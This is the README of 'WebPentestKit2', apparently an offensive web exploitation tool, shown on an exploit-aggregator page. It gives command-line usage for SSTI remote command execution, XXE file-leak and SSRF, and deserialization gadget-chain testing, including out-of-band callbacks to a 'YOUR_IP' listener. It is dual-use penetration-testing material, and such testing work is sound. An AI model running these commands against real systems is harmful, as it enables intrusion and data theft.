Share
## https://sploitus.com/exploit?id=355CD823-D880-5255-B025-F97309C13C0D
\# ðĄïļ WebPentestKit2
\*\*Advanced Web Application Exploitation Framework\*\*
\*\*SSTI · XXE · Deserialization\*\* â Three powerful modules, one command-line tool.
â ïļ \*\*For authorized systems only.\*\* This tool is intended for educational purposes and legal penetration testing.
\---
\## ðïļ Modules
| Module | Techniques | Targets |
| :--- | :--- | :--- |
| \*\*ssti\*\* | Polyglot Detection, Fingerprinting, RCE Escalation | Jinja2, Twig, Freemarker, Mako, Tornado |
| \*\*xxe\*\* | Classic, Blind/OOB, Error-based, SVG Upload, WAF Bypass | XML Parsers, SOAP, SVG-rendering endpoints |
| \*\*deser\*\* | Magic Byte Analysis, Gadget Chain Testing, OOB Callback | Java, PHP, Python (Pickle), .NET |
\---
\## ð Installation
```bash
git clone https://github.com/ozancolhak/WebPentestKit2
cd WebPentestKit2
pip install -r requirements.txt
ð Usage
ð SSTI Scanner \& Exploiter
\# Auto-detect template engine and run scan
python3 main.py ssti -u "http://target.com/render?name=test" -p name
\# Attempt RCE for a specific engine
python3 main.py ssti -u "http://target.com/view" -p q --engine jinja2 --exploit --cmd "id"
\# Fast detection with polyglot payload and JSON output
python3 main.py ssti -u "http://target.com/api" -p input --output report.json
Supported Engines:
jinja2 · twig · freemarker · velocity · smarty · mako · erb
ð XXE Suite
\# Launch classic and blind XXE tests
python3 main.py xxe -u "http://target.com/xml-api" --technique all
\# Use local callback listener for Out-of-Band detection
python3 main.py xxe -u "http://target.com/upload" --listen --port 9001 --callback "http://YOUR\_IP:9001"
\# Execute XXE attack via SVG file upload
python3 main.py xxe -u "http://target.com/avatar" --file-upload --technique classic
Features:
file-leak · ssrf-via-xxe · error-based · utf-16-bypass
ð§Đ Deserialization Scanner
\# Analyze endpoint for magic byte signatures
python3 main.py deser -u "http://target.com/session" --analyze
\# Test Java Gadget Chains with OOB detection
python3 main.py deser -u "http://target.com/api" --platform java --listen --port 8888
\# Scan for Python Pickle and .NET JSON.NET vulnerabilities
python3 main.py deser -u "http://target.com/data" --platform all --callback "http://YOUR\_IP:8888"
Platforms:
java · php · python · dotnet
ð Reporting
Every module supports structured JSON output via:
\--output report.json
Example report:
{
  "metadata": {
  "tool": "WebPentestKit2",
  "version": "2.0.0",
  "total\_findings": 1
  },
  "findings": \[
  {
  "module": "SSTI",
  "severity": "CRITICAL",
  "title": "SSTI RCE â Jinja2 (rce\_v3)",
  "description": "Remote code execution confirmed via SSTI.",
  "evidence": {
  "cmd": "id",
  "pattern": "uid=0(root)"
  }
  }
  ]
}
Severity Levels:
CRITICAL â HIGH â MEDIUM â LOW â INFO
ð License
This project is for educational and ethical security testing only.
The developer is not responsible for any misuse of this tool.